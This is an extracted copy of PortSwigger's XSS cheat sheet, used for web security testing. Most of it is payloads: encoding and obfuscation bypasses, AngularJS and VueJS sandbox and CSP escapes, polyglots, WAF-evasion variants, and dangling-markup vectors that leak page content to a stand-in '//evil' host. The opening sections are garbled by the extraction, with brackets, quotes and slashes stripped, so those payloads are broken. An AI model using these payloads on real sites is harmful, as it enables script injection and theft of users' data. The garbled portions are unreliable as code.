This cheat sheet wouldn't be possible without the web security community who share their research. Big thanks to James Kettle, Mario Heiderich, Eduardo Vela, Masato Kinugawa, Filedescriptor, LeverOne, Ben Hayak, Alex Inführ, Mathias Karlsson, Jan Horn, Ian Hickey, Gábor Molnár, tsetnep, Psych0tr1a, Skyphire, Abdulrhman Alqabandi, brainpillow, Kyo, Yosuke Hasegawa, White Jordan, Algol, jackmasa, wpulog, Bolk, Robert Hansen, David Lindsay, Superhei, Michal Zalewski, Renaud Lifchitz, Roman Ivanov, Frederik Braun, Krzysztof Kotowicz, Giorgio Maone, GreyMagic, Marcus Niemietz, Soroush Dalili, Stefano Di Paola, Roman Shafigullin, Lewis Ardern, Michał Bentkowski, SØᴘᴀS, avanish46, Juuso Käenmäki, jinmo123, itszn13, Martin Bajanik, David Granqvist, Andrea (theMiddle) Menin, simps0n, hahwul, Paweł Hałdrzyński, Jun Kokatsu, RenwaX23, sratarun, har1sec, Yann C, gadhiyasavan, p4fg, diofeher.

You can contribute to this cheat sheet by creating a new issue or updating the JSON and creating a pull request.

Page 11: Cross-site scripting (XSS) cheat sheet - PortSwigger€¦ · Cross-site scripting (XSS) cheat sheet This cross-site scripting (XSS) cheat sheet contains many vectors that can help

Set do a e a a e att bute a a e

tagcontext=js_string_singleampx=27eval(name)gtltiframegt

Set windowname via target attribute in a ltbasegt tag ltbase target=alert(1)gtlta href=httpsubdomain1portswigger-labsnetxssxssphpcontext=js_string_singleampx=27eval(name)gtXSS via target in base tagltagt

Set windowname via target attribute in a ltagt tag lta target=alert(1) href=httpsubdomain1portswigger-labsnetxssxssphpcontext=js_string_singleampx=27eval(name)gtXSS via target in a tagltagt

Set windowname via usemap attribute in a ltimggttag

ltimg src=validimagepng width=10 height=10 usemap=xssgtltmap name=xssgtltarea shape=rect coords=0082126 target=alert(1) href=httpsubdomain1portswigger-labsnetxssxssphpcontext=js_string_singleampx=27eval(name)gtltmapgt

Set windowname via target attribute in a ltformgt tag ltform action=httpsubdomain1portswigger-labsnetxssxssphp target=alert(1)gtltinput type=hidden name=x value=eval(name)gtltinput type=hidden name=context value=js_string_singlegtltinput type=submit value=XSS via target in a formgtltformgt

Set windowname via formtarget attribute in altinputgt tag type submit

ltformgtltinput type=hidden name=x value=eval(name)gtltinput type=hidden name=context value=js_string_singlegtltinput type=submit formaction=httpsubdomain1portswigger-labsnetxssxssphp formtarget=alert(1) value=XSS via formtarget in input type submitgtltformgt

Set windowname via formtarget attribute in altinputgt tag type image

ltformgtltinput type=hidden name=x value=eval(name)gtltinput type=hidden name=context value=js_string_singlegtltinput name=1 type=image src=validimagepng formaction=httpsubdomain1portswigger-labsnetxssxssphp formtarget=alert(1) value=XSS via formtarget in input type imagegtltformgt

Special tags

Redirect to a different domain ltmeta http-equiv=refresh content=0 url=portswigger-labsnetgt

Meta charset attribute UTF-7 ltmeta charset=UTF-7 gt +ADw-script+AD4-alert(1)+ADw-script+AD4-

Meta charset UTF-7 ltmeta http-equiv=Content-Type content=texthtml charset=UTF-7 gt +ADw-script+AD4-alert(1)+ADw-script+AD4-

UTF-7 BOM characters (Has to be at the start of thedocument) 1

+v8 +ADw-script+AD4-alert(1)+ADw-script+AD4-

UTF-7 BOM characters (Has to be at the start of thedocument) 2

+v9 +ADw-script+AD4-alert(1)+ADw-script+AD4-

UTF-7 BOM characters (Has to be at the start of thedocument) 3

+v+ +ADw-script+AD4-alert(1)+ADw-script+AD4-

UTF-7 BOM characters (Has to be at the start of thedocument) 4

+v +ADw-script+AD4-alert(1)+ADw-script+AD4-

Upgrade insecure requests ltmeta http-equiv=Content-Security-Policy content=upgrade-insecure-requestsgt

Disable JavaScript via iframe sandbox ltiframe sandbox src=portswigger-labsnetgtltiframegt

Disable referer ltmeta name=referrer content=no-referrergt

Encoding

Overlong UTF-8 C0BCscriptgtalert(1)ltscriptgt E080BCscriptgtalert(1)ltscriptgt F08080BCscriptgtalert(1)ltscriptgt F8808080BCscriptgtalert(1)ltscriptgt FC80808080BCscriptgtalert(1)ltscriptgt

Unicode escapes ltscriptgtu0061lert(1)ltscriptgt

Unicode escapes ES6 style ltscriptgtu61lert(1)ltscriptgt

Unicode escapes ES6 style zero padded ltscriptgtu0000000061lert(1)ltscriptgt

Hex encoding JavaScript escapes ltscriptgteval(x61lert(1))ltscriptgt

Octal encoding ltscriptgteval(141lert(1))ltscriptgt ltscriptgteval(alert(061))ltscriptgt ltscriptgteval(alert(61))ltscriptgt

Decimal encoding with optional semi-colon lta href=amp106avascriptalert(1)gtXSSltagtlta href=amp106avascriptalert(1)gtXSSltagt

SVG script with HTML encoding ltsvggtltscriptgtamp97lert(1)ltscriptgtltsvggt ltsvggtltscriptgtampx61lert(1)ltscriptgtltsvggt ltsvggtltscriptgtalertampNewLine(1)ltscriptgtltsvggt ltsvggtltscriptgtx=ampquotalert(1)ltscriptgtltsvggt

Decimal encoding with padded zeros lta href=amp0000106avascriptalert(1)gtXSSltagt

Hex encoding entities lta href=ampx6aavascriptalert(1)gtXSSltagt

Hex encoding without semi-colon provided nextcharacter is not a-f0-9

lta href=jampx61vascriptalert(1)gtXSSltagt lta href=ampx6a avascriptalert(1)gtXSSltagt lta href=ampx6a avascriptalert(1)gtXSSltagt

Hex encoding with padded zeros lta href=ampx0000006aavascriptalert(1)gtXSSltagt

Hex encoding is not case sensitive lta href=ampX6Aavascriptalert(1)gtXSSltagt

HTML entities lta href=javascriptampcolonalert(1)gtXSSltagt lta href=javaampTabscriptalert(1)gtXSSltagt lta href=javaampNewLinescriptalert(1)gtXSSltagt lta href=javascriptampcolonalertamplpar1amprpargtXSSltagt

URL encoding lta href=javascriptx=27-alert(1)-27gtXSSltagt

HTML entities and URL encoding lta href=javascriptx=amppercnt27-alert(1)-27gtXSSltagt

Obfuscation

Data protocol inside script src with base64 ltscript src=datatextjavascriptbase64YWxlcnQoMSk=gtltscriptgt

Data protocol inside script src with base64 andHTML entities

ltscript src=datatextjavascriptbase64ampx59ampx57ampx78ampx6campx63ampx6eampx51ampx6fampx4dampx53ampx6bampx3dgtltscriptgt

Data protocol inside script src with base64 and URLencoding

ltscript src=datatextjavascriptbase645957786c636e516f4d536b3dgtltscriptgt

Iframe srcdoc HTML encoded ltiframe srcdoc=ampltscriptampgtalertamplpar1amprparampltampsolscriptampgtgtltiframegt

Iframe JavaScript URL with HTML and URL encoding ltiframe src=javascriptampx25ampx33ampx43ampx73ampx63ampx72ampx69ampx70ampx74ampx25ampx33ampx45ampx61ampx6campx65ampx72ampx74ampx28ampx31ampx29ampx25ampx33ampx43ampx25ampx32ampx46ampx73ampx63ampx72ampx69ampx70ampx74ampx25ampx33ampx45gtltiframegt

SVG script with unicode escapes and HTMLencoding

ltsvggtltscriptgtampx5campx75ampx30ampx30ampx36ampx31ampx5campx75ampx30ampx30ampx36ampx63ampx5campx75ampx30ampx30ampx36ampx35ampx5campx75ampx30ampx30ampx37ampx32ampx5campx75ampx30ampx30ampx37ampx34(1)ltscriptgtltsvggt

Client-side template injection

VueJS reflected

Version Author Length Vector

All versions Mario Heiderich (Cure53) 41 constructorconstructor(alert(1))()

All versions Mario Heiderich (Cure53) ampSebastian Lekies (Google)Eduardo Vela Nava (Google)Krzysztof Kotowicz (Google)

62 ltdiv v-html=constructorconstructor(alert(1))()gtaltdivgt

All versions Gareth Heyes (PortSwigger) 39 ltx v-html=_cconstructor(alert(1))()gt

All versions Peter af Geijerstam (SwedishShellcode Factory)

37 ltx v-if=_cconstructor(alert(1))()gt

AngularJS sandbox escapes reflected

Version Author Length Vector

101 - 115 Mario Heiderich (Cure53) 41 constructorconstructor(alert(1))()

101 - 115(shorter)

Gareth Heyes (PortSwigger) ampLewis Ardern (Synopsys)

33 $onconstructor(alert(1))()

120 - 121 Jan Horn (Google) 122 a=constructorb=asubcallcall(b[a]getOwnPropertyDescriptor(b[a]getPrototypeOf(asub)a)value0alert(1))()

122 - 125 Gareth Heyes (PortSwigger) 23 )))alert(1)

126 - 1218 Jan Horn (Google) 106 (_=sub)callcall([$=constructor]getOwnPropertyDescriptor(___proto__$)value0alert(1))()

1219 - 1223 Mathias Karlsson (Detectify) 124 toStringconstructorprototypetoString=toStringconstructorprototypecall[aalert(1)]sort(toStringconstructor)

1224 - 1229 Gareth Heyes (PortSwigger) 23 )))alert(1)

1227-1229130-1320

Gareth Heyes (PortSwigger) 23 )))alert(1)

130 Gaacutebor Molnaacuter (Google) 272 ready ampamp (ready = true) ampamp ( call $$watchers[0]get(toStringconstructorprototype) (a = apply) ampamp (apply = constructor) ampamp (valueOf = call) ampamp (+toString( F = Functionprototype + Fapply = Fa + delete Fa + delete FvalueOf + alert(1) )))

133 - 1318 Gareth Heyes (PortSwigger) 128 [toString[]joinlength10__proto__]assign=[]joinaconstructorprototypecharAt=

[]join$eval(x=alert(1))

1319 Gareth Heyes (PortSwigger) 102 a[toStringfalsevalueOf[]joinlength10__proto__]charAt=[]join$eval(x=alert(1))

1320 Gareth Heyes (PortSwigger) 65 aconstructorprototypecharAt=[]join$eval(x=alert(1))

140 - 149 Gareth Heyes (PortSwigger) 74 aconstructorprototypecharAt=[]join$eval(x=1 alert(1))

150 - 158 Ian Hickey amp Gareth Heyes(PortSwigger)

79 x=yconstructorprototypex[y]charAt=[]join$eval(x=alert(1))

159 - 1511 Jan Horn (Google) 517 c=subcallb=subbinda=subapply c$apply=$applyc$eval=bop=$root$$phase $root$$phase=nullod=$root$digest$root$digest=()toString C=c$apply(c)$root$$phase=op$root$digest=od B=C(bcb)$evalAsync( astNode=pop()astNodetype=UnaryExpression astNodeoperator=(windowXvoid0(windowX=truealert(1)))+ astNodeargument=typeIdentifiernamefoo ) m1=B($$asyncQueuepop()expressionnull$root) m2=B(Cnullm1)[]pushapply=m2a=sub $eval(a(bc))[]pushapply=a

gt=160 Mario Heiderich (Cure53) 41 constructorconstructor(alert(1))()

gt=160 (shorter) Gareth Heyes (PortSwigger) ampLewis Ardern (Synopsys)

33 $onconstructor(alert(1))()

DOM based AngularJS sandbox escapes (Using orderBy or no $eval)

Version Author Length Vector

101 - 115 Mario Heiderich (Cure53) 37 constructorconstructor(alert(1))()

120 - 1218 Jan Horn (Google) 118 a=constructorb=asubcallcall(b[a]getOwnPropertyDescriptor(b[a]getPrototypeOf(asub)a)value0alert(1))()

1219 - 1223 Mathias Karlsson (Detectify) 119 toStringconstructorprototypetoString=toStringconstructorprototypecall[aalert(1)]sort(toStringconstructor)

1224 - 1226 Gareth Heyes (PortSwigger) 317 [[__proto__]][x]=constructorgetOwnPropertyDescriptorg=[[__proto__]][x][[__proto__]][y]=g(sub[[__proto__]]constructor)[[__proto__]][z]=constructordefinePropertyd=[[__proto__]][z]d(sub[[__proto__]]constructorvaluefalse)[[__proto__]][y]value(alert(1))()

1227-1229130-1320

Gareth Heyes (PortSwigger) 20 )))alert(1)

140-145 Gareth Heyes (PortSwigger) 75 aconstructorprototypecharAt=[]join[1]|orderByx=1 alert(1)

gt=160 Mario Heiderich (Cure53) 37 constructorconstructor(alert(1))()

144 (withoutstrings)

Gareth Heyes (PortSwigger) 134 toString()constructorprototypecharAt=[]join [12]|orderBytoString()constructorfromCharCode(1206197108101114116404941)

AngularJS CSP bypasses

Version | Author | Length | Vector

All versions (Chrome) | Gareth Heyes (PortSwigger) | 81 | <input autofocus ng-focus="$event.path|orderBy:'[].constructor.from([1],alert)'">

All versions (Chrome), shorter | Gareth Heyes (PortSwigger) | 56 | <input id=x ng-focus=$event.path|orderBy:'(z=alert)(1)'>

All versions (all browsers), shorter | Gareth Heyes (PortSwigger) | 91 | <input autofocus ng-focus="$event.composedPath()|orderBy:'[].constructor.from([1],alert)'">

1.2.0 - 1.5.0 | Eduardo Vela (Google) | 190 | <div ng-app ng-csp><div ng-focus="x=$event;" id=f tabindex=0>foo</div><div ng-repeat="(key, value) in x.view"><div ng-if="key == 'window'">{{ [1].reduce(value.alert, 1); }}</div></div></div>

All versions (Chrome), shorter via oncut | Savan Gadhiya (NotSoSecure) | 49 | <input ng-cut=$event.path|orderBy:'(y=alert)(1)'>

Scriptless attacks

Dangling markup

Background attribute: <body background="//evil? <table background="//evil? <table><thead background="//evil? <table><tbody background="//evil? <table><tfoot background="//evil? <table><td background="//evil? <table><th background="//evil?

Link href stylesheet: <link rel=stylesheet href="//evil?

Link href icon: <link rel=icon href="//evil?

Meta refresh: <meta http-equiv="refresh" content="0; http://evil?

Img to pass markup through src attribute: <img src="//evil? <image src="//evil?

Video using track element: <video><track default src="//evil?

Video using source element and src attribute: <video><source src="//evil?

Audio using source element and src attribute: <audio><source src="//evil?

Input src: <input type=image src="//evil?

Button using formaction: <form><button style="width:100%;height:100%" type=submit formaction="//evil?

Input using formaction: <form><input type=submit value="XSS" style="width:100%;height:100%" type=submit formaction="//evil?

Form using action: <button form=x style="width:100%;height:100%;"><form id=x action="//evil?

Object data: <object data="//evil?

Iframe src: <iframe src="//evil?

Embed src: <embed src="//evil?

Embed src: <embed src evil

Use textarea to consume markup and post to external site: <form><button formaction=//evil>XSS</button><textarea name=x>

Pass markup data through window.name using formtarget: <button form=x>XSS</button><form id=x action=//evil target='

Pass markup data through window.name using base target: <a href=http://subdomain1.portswigger-labs.net/dangling_markup/name.html><font size=100 color=red>You must click me</font></a><base target="

Pass markup data through window.name using formtarget: <form><input type=submit value="Click me" formaction=http://subdomain1.portswigger-labs.net/dangling_markup/name.html formtarget="

Using base href to pass data: <a href=abc style="width:100%;height:100%;position:absolute;font-size:1000px;">xss<base href="//evil/

Using embed window name to pass data from the page: <embed src=http://subdomain1.portswigger-labs.net/dangling_markup/name.html name="

Using iframe window name to pass data from the page: <iframe src=http://subdomain1.portswigger-labs.net/dangling_markup/name.html name="

Using object window name to pass data from the page: <object data=http://subdomain1.portswigger-labs.net/dangling_markup/name.html name="

Using frame window name to pass data from the page: <frameset><frame src=http://subdomain1.portswigger-labs.net/dangling_markup/name.html name="

Overwrite type attribute with image in hidden inputs: <input type=hidden type=image src="//evil?

Polyglots

Polyglot payload 1: javascript:/*--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert(1)//'>

Polyglot payload 2: javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*&lt;svg/*/onload=alert()//>

Polyglot payload 3: javascript:/*--></title></style></textarea></script></xmp><details/open/ontoggle='+/`/+/onmouseover=1/+/[*/[]/+alert(/@PortSwiggerRes/)//'>

WAF bypass global objects

XSS into a JavaScript string, string concatenation (window): window["ale"+"rt"](window["doc"+"ument"]["dom"+"ain"])

XSS into a JavaScript string, string concatenation (self): self["ale"+"rt"](self["doc"+"ument"]["dom"+"ain"])

XSS into a JavaScript string, string concatenation (this): this["ale"+"rt"](this["doc"+"ument"]["dom"+"ain"])

XSS into a JavaScript string, string concatenation (top): top["ale"+"rt"](top["doc"+"ument"]["dom"+"ain"])

XSS into a JavaScript string, string concatenation (parent): parent["ale"+"rt"](parent["doc"+"ument"]["dom"+"ain"])

XSS into a JavaScript string, string concatenation (frames): frames["ale"+"rt"](frames["doc"+"ument"]["dom"+"ain"])

XSS into a JavaScript string, string concatenation (globalThis): globalThis["ale"+"rt"](globalThis["doc"+"ument"]["dom"+"ain"])

XSS into a JavaScript string, comment syntax (window): window[/*foo*/"alert"/*bar*/](window[/*foo*/"document"/*bar*/]["domain"])

XSS into a JavaScript string, comment syntax (self): self[/*foo*/"alert"/*bar*/](self[/*foo*/"document"/*bar*/]["domain"])

XSS into a JavaScript string, comment syntax (this): this[/*foo*/"alert"/*bar*/](this[/*foo*/"document"/*bar*/]["domain"])

XSS into a JavaScript string, comment syntax (top): top[/*foo*/"alert"/*bar*/](top[/*foo*/"document"/*bar*/]["domain"])

XSS into a JavaScript string, comment syntax (parent): parent[/*foo*/"alert"/*bar*/](parent[/*foo*/"document"/*bar*/]["domain"])

XSS into a JavaScript string, comment syntax (frames): frames[/*foo*/"alert"/*bar*/](frames[/*foo*/"document"/*bar*/]["domain"])

XSS into a JavaScript string, comment syntax (globalThis): globalThis[/*foo*/"alert"/*bar*/](globalThis[/*foo*/"document"/*bar*/]["domain"])

XSS into a JavaScript string, hex escape sequence (window): window["\x61\x6c\x65\x72\x74"](window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x64\x6f\x6d\x61\x69\x6e"])

XSS into a JavaScript string, hex escape sequence (self): self["\x61\x6c\x65\x72\x74"](self["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x64\x6f\x6d\x61\x69\x6e"])

XSS into a JavaScript string, hex escape sequence (this): this["\x61\x6c\x65\x72\x74"](this["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x64\x6f\x6d\x61\x69\x6e"])

XSS into a JavaScript string, hex escape sequence (top): top["\x61\x6c\x65\x72\x74"](top["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x64\x6f\x6d\x61\x69\x6e"])

XSS into a JavaScript string, hex escape sequence (parent): parent["\x61\x6c\x65\x72\x74"](parent["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x64\x6f\x6d\x61\x69\x6e"])

XSS into a JavaScript string, hex escape sequence (frames): frames["\x61\x6c\x65\x72\x74"](frames["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x64\x6f\x6d\x61\x69\x6e"])

XSS into a JavaScript string, hex escape sequence (globalThis): globalThis["\x61\x6c\x65\x72\x74"](globalThis["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x64\x6f\x6d\x61\x69\x6e"])

XSS into a JavaScript string, hex escape sequence and base64 encoded string (window): window["\x65\x76\x61\x6c"](window["\x61\x6c\x65\x72\x74"](window["\x61\x74\x6f\x62"]("WFNT")))

XSS into a JavaScript string, hex escape sequence and base64 encoded string (self): self["\x65\x76\x61\x6c"](self["\x61\x6c\x65\x72\x74"](self["\x61\x74\x6f\x62"]("WFNT")))

XSS into a JavaScript string, hex escape sequence and base64 encoded string (this): this["\x65\x76\x61\x6c"](this["\x61\x6c\x65\x72\x74"](this["\x61\x74\x6f\x62"]("WFNT")))

XSS into a JavaScript string, hex escape sequence and base64 encoded string (top): top["\x65\x76\x61\x6c"](top["\x61\x6c\x65\x72\x74"](top["\x61\x74\x6f\x62"]("WFNT")))

XSS into a JavaScript string, hex escape sequence and base64 encoded string (parent): parent["\x65\x76\x61\x6c"](parent["\x61\x6c\x65\x72\x74"](parent["\x61\x74\x6f\x62"]("WFNT")))

XSS into a JavaScript string, hex escape sequence and base64 encoded string (frames): frames["\x65\x76\x61\x6c"](frames["\x61\x6c\x65\x72\x74"](frames["\x61\x74\x6f\x62"]("WFNT")))

XSS into a JavaScript string, hex escape sequence and base64 encoded string (globalThis): globalThis["\x65\x76\x61\x6c"](globalThis["\x61\x6c\x65\x72\x74"](globalThis["\x61\x74\x6f\x62"]("WFNT")))

XSS into a JavaScript string, octal escape sequence (window): window["\141\154\145\162\164"]("\130\123\123")

XSS into a JavaScript string, octal escape sequence (self): self["\141\154\145\162\164"]("\130\123\123")

XSS into a JavaScript string, octal escape sequence (this): this["\141\154\145\162\164"]("\130\123\123")

XSS into a JavaScript string, octal escape sequence (top): top["\141\154\145\162\164"]("\130\123\123")

XSS into a JavaScript string, octal escape sequence (parent): parent["\141\154\145\162\164"]("\130\123\123")

XSS into a JavaScript string, octal escape sequence (frames): frames["\141\154\145\162\164"]("\130\123\123")

XSS into a JavaScript string, octal escape sequence (globalThis): globalThis["\141\154\145\162\164"]("\130\123\123")

XSS into a JavaScript string, unicode escape (window): window["\u0061\u006c\u0065\u0072\u0074"]("\u0058\u0053\u0053")

XSS into a JavaScript string, unicode escape (self): self["\u0061\u006c\u0065\u0072\u0074"]("\u0058\u0053\u0053")

XSS into a JavaScript string, unicode escape (this): this["\u0061\u006c\u0065\u0072\u0074"]("\u0058\u0053\u0053")

XSS into a JavaScript string, unicode escape (top): top["\u0061\u006c\u0065\u0072\u0074"]("\u0058\u0053\u0053")

XSS into a JavaScript string, unicode escape (parent): parent["\u0061\u006c\u0065\u0072\u0074"]("\u0058\u0053\u0053")

XSS into a JavaScript string, unicode escape (frames): frames["\u0061\u006c\u0065\u0072\u0074"]("\u0058\u0053\u0053")

XSS into a JavaScript string, unicode escape (globalThis): globalThis["\u0061\u006c\u0065\u0072\u0074"]("\u0058\u0053\u0053")

XSS into a JavaScript string, RegExp source property (window): window[/al/.source+/ert/.source](/XSS/.source)

XSS into a JavaScript string, RegExp source property (self): self[/al/.source+/ert/.source](/XSS/.source)

XSS into a JavaScript string, RegExp source property (this): this[/al/.source+/ert/.source](/XSS/.source)

XSS into a JavaScript string, RegExp source property (top): top[/al/.source+/ert/.source](/XSS/.source)

XSS into a JavaScript string, RegExp source property (parent): parent[/al/.source+/ert/.source](/XSS/.source)

XSS into a JavaScript string, RegExp source property (frames): frames[/al/.source+/ert/.source](/XSS/.source)

XSS into a JavaScript string, RegExp source property (globalThis): globalThis[/al/.source+/ert/.source](/XSS/.source)

XSS into a JavaScript string, Hieroglyphy/JSFuck (window): window[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]]((+{}+[])[+!![]])

XSS into a JavaScript string, Hieroglyphy/JSFuck (self): self[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]]((+{}+[])[+!![]])

XSS into a JavaScript string, Hieroglyphy/JSFuck (this): this[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]]((+{}+[])[+!![]])

XSS into a JavaScript string, Hieroglyphy/JSFuck (top): top[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]]((+{}+[])[+!![]])

XSS into a JavaScript string, Hieroglyphy/JSFuck (parent): parent[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]]((+{}+[])[+!![]])

XSS into a JavaScript string, Hieroglyphy/JSFuck (frames): frames[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]]((+{}+[])[+!![]])

XSS into a JavaScript string, Hieroglyphy/JSFuck (globalThis): globalThis[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]]((+{}+[])[+!![]])

Impossible labs

Title | Description | Length limit | Closest vector

Basic context, WAF blocks <[a-zA-Z] | This lab captures the scenario when you can't use an open tag followed by an alphanumeric character. Sometimes you can solve this problem by bypassing the WAF entirely, but what about when that's not an option? Certain versions of .NET have this behaviour, and it's only known to be exploitable in old IE with <%tag. | N/A | N/A

Script based injection, but quotes, forward slash and backslash are escaped | We often encounter this situation in the wild: you have an injection inside a JavaScript variable and can inject angle brackets, but quotes and forward/backslashes are escaped, so you can't simply close the script block. The closest we've got to solving this is when you have multiple injection points: the first within a script based context and the second in HTML. | N/A | N/A

innerHTML context, but no equals allowed | You have a site that processes the query string and URL decodes the parameters, but splits on the equals and then assigns to innerHTML. In this context <script> doesn't work and we can't use = to create an event. | N/A | N/A

Basic context, length limit | This lab's injection occurs within the basic HTML context but has a length limitation of 15. Filedescriptor came up with a vector that could execute JavaScript in 16 characters, <q/oncut=alert``, but can you beat it? | 15 | <q/oncut=alert``

Attribute context, length limit | The context of this lab is inside an attribute with a length limitation of 14 characters. We came up with a vector that executes JavaScript in 15 characters, "oncut=alert``+ (the plus is a trailing space). Do you think you can beat it? | 14 | "oncut=alert``

Basic context, length limit, arbitrary code | It's all well and good executing JavaScript, but if all you can do is call alert, what use is that? In this lab we demonstrate the shortest possible way to execute arbitrary code. | 19 | <q/oncut=eval(name)

Attribute context, length limit, arbitrary code | Again, calling alert proves you can call a function, but we created another lab to find the shortest possible attribute based injection with arbitrary JavaScript. | 17 | See link

Injection occurs inside a frameset but before the body | We received a request from Twitter about this next lab. It occurs within a frameset but before a body tag, with equals filtered. You would think you could inject a closing frameset followed by a script block, but that would be too easy. | N/A | N/A

Injection occurs inside single quoted string, only characters a-zA-Z0-9+` are allowed | The injection occurs within a single quoted string and the challenge is to execute arbitrary code using the charset a-zA-Z0-9+`. | N/A | N/A

Classic vectors (XSS crypt)

Image src with JavaScript protocol: <img src="javascript:alert(1)">

Body background with JavaScript protocol: <body background="javascript:alert(1)">

Iframe data URLs no longer work, as modern browsers use a null origin: <iframe src="data:text/html,<img src=1 onerror=alert(document.domain)>">

VBScript protocol used to work in IE: <a href="vbscript:MsgBox+1">XSS</a> <a href="#" onclick="vbs:Msgbox+1">XSS</a> <a href="#" onclick="VBS:Msgbox+1">XSS</a> <a href="#" onclick="vbscript:Msgbox+1">XSS</a> <a href="#" onclick="VBSCRIPT:Msgbox+1">XSS</a> <a href="#" language=vbs onclick="vbscript:Msgbox+1">XSS</a>

JScript compact was a minimal version of JS that wasn't widely used in IE: <a href="#" onclick="jscript.compact:alert(1);">test</a> <a href="#" onclick="JSCRIPT.COMPACT:alert(1);">test</a>

JScript.Encode allows encoded JavaScript: <a href="#" language="JScript.Encode" onclick="#@~^CAAAAA==C^+D`8mgIAAA==^#~@">XSS</a> <a href="#" onclick="JScript.Encode:#@~^CAAAAA==C^+D`8mgIAAA==^#~@">XSS</a>

VBScript.Encode allows encoded VBScript: <iframe onload="VBScript.Encode:#@~^CAAAAA==ko$K6FoQIAAA==^#~@"> <iframe language="VBScript.Encode" onload="#@~^CAAAAA==ko$K6FoQIAAA==^#~@">

JavaScript entities used to work in Netscape Navigator: <a title="&{alert(1)}">XSS</a>

JavaScript stylesheets used to be supported by Netscape Navigator: <link href="xss.js" rel=stylesheet type="text/javascript">

Button used to consume markup: <form><button name=x formaction=x><b>stealme

IE9 select elements and plaintext used to consume markup: <form action=x><button>XSS</button><select name=x><option><plaintext><script>token="supersecret"</script>

XBL, Firefox only <= 2: <div style="-moz-binding:url(//businessinfo.co.uk/labs/xbl/xbl.xml#xss)"> <div style="\-\mo\z-binding:url(//businessinfo.co.uk/labs/xbl/xbl.xml#xss)"> <div style="-moz-bindin\67:url(//businessinfo.co.uk/labs/xbl/xbl.xml#xss)"> <div style="-moz-bindin&#x5c;67:url(//businessinfo.co.uk/labs/xbl/xbl.xml#xss)">

XBL also worked in FF3.5 using data URLs: <img src="blah" style="-moz-binding: url(data:text/xml;charset=utf-8,%3C%3Fxml%20version%3D%221.0%22%3F%3E%3Cbindings%20xmlns%3D%22http%3A//www.mozilla.org/xbl%22%3E%3Cbinding%20id%3D%22loader%22%3E%3Cimplementation%3E%3Cconstructor%3E%3C%21%5BCDATA%5Bvar%20url%20%3D%20%22alert.js%22%3B%20var%20scr%20%3D%20document.createElement%28%22script%22%29%3B%20scr.setAttribute%28%22src%22%2Curl%29%3B%20var%20bodyElement%20%3D%20document.getElementsByTagName%28%22html%22%29.item%280%29%3B%20bodyElement.appendChild%28scr%29%3B%20%5D%5D%3E%3C/constructor%3E%3C/implementation%3E%3C/binding%3E%3C/bindings%3E)">

CSS expressions, <= IE7: <div style="xss:expression(alert(1))"> <div style="xss:expression(1)-alert(1)"> <div style="xss:expressio\6e(alert(1))"> <div style="xss:expressio\006e(alert(1))"> <div style="xss:expressio\00006e(alert(1))"> <div style="xss:expressio\6e(alert(1))"> <div style="xss:expressio&#x5c;6e(alert(1))">

In quirks mode IE allowed you to use = instead of :  <div style="xss=expression(alert(1))"> <div style="color&#x3d;red">test</div>

Behaviors for older modes of IE: <a style="behavior:url(#default#AnchorClick);" folder="javascript:alert(1)">XSS</a>

Older versions of IE supported event handlers in functions: <script> function window.onload() { alert(1) } </script> <script> function window::onload() { alert(1) } </script> <script> function window.location() { } </script> <body> <script> function/*<img src=1 onerror=alert(1)>*/document.body.innerHTML() { } </script> </body> <body> <script> function document.body.innerHTML() { x = "<img src=1 onerror=alert(1)>" } </script> </body>

GreyMagic HTML+TIME exploit (no longer works, even in docmode 5): <HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS<img src=1 onerror=alert(1)>"> </BODY></HTML>

Firefox allows NULLs after &: <a href="javascript:&\0#x6a;avascript:alert(1)">Firefox</a>

Firefox allows NULLs inside named entities: <a href="javascript:&colon;alert(1)">Firefox</a>

Firefox allows NULL characters inside opening comments: <!-\0- ><img title="--><iframe/onload=alert(1)>"> -->

Safari used to allow any tag to have an onload event inside SVG: <svg><xss onload=alert(1)>

Isindex using src attribute: <isindex type=image src="//evil?

Isindex using submit: <isindex type=submit style=width:100%;height:100%; value=XSS formaction="//evil?

Isindex and formaction: <isindex type=submit formaction="javascript:alert(1)">

Isindex and action: <isindex type=submit action="javascript:alert(1)">

Credits

Brought to you by PortSwigger, lovingly constructed by Gareth Heyes.

